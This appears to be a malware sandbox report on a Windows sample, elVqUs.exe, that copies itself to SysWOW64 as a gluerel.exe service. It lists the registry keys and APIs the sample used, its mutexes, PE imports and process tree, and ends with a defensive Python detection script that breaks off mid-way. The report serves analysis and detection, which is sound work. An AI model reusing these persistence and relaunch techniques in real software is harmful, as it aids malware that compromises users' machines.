HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_USERS\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_USERS\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\NoFileFolderConnection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceCopyACLWithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoEncryptOnMove
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\Environment
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.HeapAlloc
kernel32.dll.HeapFree
kernel32.dll.GetTickCount
oleaut32.dll.#200
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
comctl32.dll.#385
comctl32.dll.#320
comctl32.dll.#324
comctl32.dll.#323
ole32.dll.CreateBindCtx
ole32.dll.CoTaskMemAlloc
ole32.dll.CoGetApartmentType
ole32.dll.CoRegisterInitializeSpy
ole32.dll.CoTaskMemFree
comctl32.dll.#236
oleaut32.dll.#6
ole32.dll.CoGetMalloc
comctl32.dll.#328
comctl32.dll.#334
oleaut32.dll.#2
ole32.dll.CoCreateInstance
advapi32.dll.InitializeSecurityDescriptor
advapi32.dll.SetEntriesInAclW
ntmarta.dll.GetMartaExtensionInterface
advapi32.dll.SetSecurityDescriptorDacl
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#332
comctl32.dll.#386
advapi32.dll.IsTextUnicode
comctl32.dll.#338
comctl32.dll.#339
shell32.dll.#102
advapi32.dll.OpenThreadToken
propsys.dll.PSLookupPropertyHandlerCLSID
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegCloseKey
propsys.dll.PSCreatePropertyStoreFromObject
propsys.dll.#417
propsys.dll.PropVariantToStringAlloc
ole32.dll.PropVariantClear
propsys.dll.PSCreateMemoryPropertyStore
propsys.dll.PropVariantToBuffer
propsys.dll.PropVariantToUInt64
propsys.dll.PropVariantToBoolean
propsys.dll.InitPropVariantFromBuffer
advapi32.dll.GetNamedSecurityInfoW
advapi32.dll.TreeSetNamedSecurityInfoW
ole32.dll.CoUninitialize
comctl32.dll.#329
comctl32.dll.#388
comctl32.dll.#321
ole32.dll.CoRevokeInitializeSpy
oleaut32.dll.#500
comctl32.dll.#387
comctl32.dll.#327
advapi32.dll.UnregisterTraceGuids
cryptsp.dll.CryptReleaseContext
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptGenKey
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptDuplicateHash
cryptsp.dll.CryptEncrypt
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptVerifySignatureW
C:\Users\user\AppData\Local\Temp\elVqUs.exe --291d5ab2
"C:\Windows\SysWOW64\gluerel.exe"
C:\Windows\SysWOW64\gluerel.exe --caeb0eba
rrtlnsuwfk
Global\IA4889F95
Global\MA4889F95
IESQMMUTEX_0_208
gluerel
gluerel

PE Information

Image Base 0x00400000
Entry Point 0x0040170b
Reported Checksum 0x00018d65
Actual Checksum 0x00018d65
Minimum OS Version 5.0
Compile Time 2012-09-03 09:06:24
Import Hash d4b43982e204014a37d1da76a3c65d78

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x000016bb 0x00001800 IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 3.98
.ret 0x00003000 0x00011086 0x00011200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 7.89

Imports

Library kernel32.dll:
0x403a28 CompareStringA
0x403a2c GetModuleFileNameA
0x403a30 LoadLibraryW
0x403a34 GetCurrentThread
0x403a3c CreateFileW
0x403a44 ReadProcessMemory
0x403a48 GetModuleHandleA
0x403a4c OpenMutexA
0x403a50 VirtualAlloc
0x403a58 SetLocalTime
0x403a5c GetTempPathA
Library certcli.dll:
0x403a64 CAEnumNextCA
0x403a68 CADeleteCA
0x403a6c CACloseCertType
0x403a70 CAEnumFirstCA
0x403a74 CACloseCA
Library advapi32.dll:
0x403a7c CreateServiceA
0x403a80 RegEnumKeyA
0x403a84 RegLoadKeyW
0x403a88 CryptSignHashA
0x403a8c ControlService
0x403a90 RegOpenKeyA
0x403a94 LogonUserW
0x403a98 RegDeleteValueW
0x403a9c RegCreateKeyExA
0x403aa0 OpenEventLogA
0x403aa4 StartServiceW
0x403aa8 RegRestoreKeyW
0x403aac RegUnLoadKeyW
0x403ab0 RegReplaceKeyA

.text
`.ret
umjukiloplkjhytgvfrtvbnjgf
VirtualAllocEx
gxxx_ro_e__Memory
kernel32.dll
foadLibraryExW
rrtlnsuwfk
npukeqplfmiv
dvwcrurjonpasvn
demjdbvpunhqfsss
VirtualAlloc
GetCurrentThread
GetTempPathA
CreateFileW
LoadLibraryW
GetModuleHandleA
ReadProcessMemory
CompareStringA
SetLocalTime
OpenMutexA
GetEnvironmentVariableW
FileTimeToSystemTime
GetEnvironmentVariableA
GetModuleFileNameA
kernel32.dll
CADeleteCA
CAEnumNextCA
CACloseCertType
CACloseCA
CAEnumFirstCA
certcli.dll
RegCreateKeyExA
RegLoadKeyW
RegEnumKeyA
RegDeleteValueW
RegOpenKeyA
StartServiceW
CryptSignHashA
RegRestoreKeyW
ControlService
OpenEventLogA
LogonUserW
RegReplaceKeyA
RegUnLoadKeyW
CreateServiceA
advapi32.dll
EAPPCFG.dll
This file is not on VirusTotal.

Process Tree


elVqUs.exe, PID: 2008, Parent PID: 2584
Full Path: C:\Users\user\AppData\Local\Temp\elVqUs.exe
Command Line: "C:\Users\user\AppData\Local\Temp\elVqUs.exe"
elVqUs.exe, PID: 2972, Parent PID: 2008
Full Path: C:\Users\user\AppData\Local\Temp\elVqUs.exe
Command Line: --291d5ab2
services.exe, PID: 460, Parent PID: 372
Full Path: C:\Windows\sysnative\services.exe
Command Line: C:\Windows\system32\services.exe
gluerel.exe, PID: 1088, Parent PID: 460
Full Path: C:\Windows\SysWOW64\gluerel.exe
Command Line: "C:\Windows\SysWOW64\gluerel.exe"
gluerel.exe, PID: 2444, Parent PID: 1088
Full Path: C:\Windows\SysWOW64\gluerel.exe
Command Line: --caeb0eba
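Two habits in the tree above are worth turning into a check: each stage re-launches its own image with a single `--<8 hex digits>` argument (2008 -> 2972, 1088 -> 2444), and the SysWOW64 copy is started by services.exe, i.e. it runs as a service (the imports above also list CreateServiceA and StartServiceW). The Python below is an added example, not CAPE code: it parses the process-tree text in the layout printed above and flags both patterns; on a live host the same two tests apply to Sysmon event 1 fields (Image, ParentImage, CommandLine). The services.exe check is a triage lead only, since a legitimate 32-bit service trips it as well.

```python
import re
from dataclasses import dataclass

# Constructed input: the Process Tree block of this report, in the
# "name, PID, Parent PID / Full Path / Command Line" layout CAPE prints.
PROCESS_TREE = r"""
elVqUs.exe, PID: 2008, Parent PID: 2584
Full Path: C:\Users\user\AppData\Local\Temp\elVqUs.exe
Command Line: "C:\Users\user\AppData\Local\Temp\elVqUs.exe"
elVqUs.exe, PID: 2972, Parent PID: 2008
Full Path: C:\Users\user\AppData\Local\Temp\elVqUs.exe
Command Line: --291d5ab2
services.exe, PID: 460, Parent PID: 372
Full Path: C:\Windows\sysnative\services.exe
Command Line: C:\Windows\system32\services.exe
gluerel.exe, PID: 1088, Parent PID: 460
Full Path: C:\Windows\SysWOW64\gluerel.exe
Command Line: "C:\Windows\SysWOW64\gluerel.exe"
gluerel.exe, PID: 2444, Parent PID: 1088
Full Path: C:\Windows\SysWOW64\gluerel.exe
Command Line: --caeb0eba
"""

HEADER_RE = re.compile(r"^(?P<name>\S+), PID: (?P<pid>\d+), Parent PID: (?P<ppid>\d+)$")
# The second stage in this run is launched as "<same image> --<8 hex digits>".
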